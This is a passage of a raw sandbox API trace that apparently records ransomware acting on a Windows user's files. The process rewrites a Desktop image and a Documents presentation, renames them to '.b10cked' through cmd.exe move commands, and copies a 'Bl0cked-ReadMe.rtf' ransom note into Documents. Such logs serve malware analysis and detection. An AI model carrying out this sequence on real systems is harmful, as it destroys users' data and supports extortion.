hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x118fc [0229.178] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11de4 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11de4 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.180] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8ef1, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.180] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8ef1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-36593, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8ef3 [0229.180] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8ef1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.181] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-36593, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8ef3 [0229.181] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8ef1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VX2e_AgjuFQyd1Woq.bmp", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0229.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VX2e_AgjuFQyd1Woq.bmp", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VX2e_AgjuFQyd1Woq.bmp", lpUsedDefaultChar=0x0) returned 21 [0229.185] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11de4 [0229.185] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.185] CloseHandle (hObject=0x1b4) returned 1 [0229.186] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP") returned 0x25 [0229.187] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0229.187] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9c4, dwThreadId=0xeb0)) returned 1 [0229.192] CloseHandle (hObject=0x120) returned 1 [0229.192] CloseHandle (hObject=0x1b4) returned 1 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.192] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0229.192] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.192] ReleaseMutex (hMutex=0xf8) returned 1 [0229.192] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.192] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.193] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.193] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\documents\\1ub93z-ou.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28598221051) returned 1 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x662 [0229.194] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.195] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.195] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb4a [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb4a [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.196] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.196] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1444, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5a6 [0229.196] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=-1444, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5a6 [0229.196] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x5a4, lpOverlapped=0x0) returned 1 [0229.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1uB93z-ou.pptx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0229.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1uB93z-ou.pptx", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1uB93z-ou.pptx", lpUsedDefaultChar=0x0) returned 14 [0229.200] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb4a [0229.200] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.201] CloseHandle (hObject=0x1b4) returned 1 [0229.201] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\1uB93z-ou.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT") returned 0x26 [0229.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0229.202] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe80, dwThreadId=0xe7c)) returned 1 [0229.486] CloseHandle (hObject=0x120) returned 1 [0229.486] CloseHandle (hObject=0x1b4) returned 1 [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 3 [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.487] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0229.487] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0229.487] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.487] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.487] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x748, dwThreadId=0x9a8)) returned 1 [0229.495] CloseHandle (hObject=0x120) returned 1 [0229.495] CloseHandle (hObject=0x1b4) returned 1 [0229.495] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0229.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.495] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.495] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\g ol7OxwE18leXod.csv" (normalized: 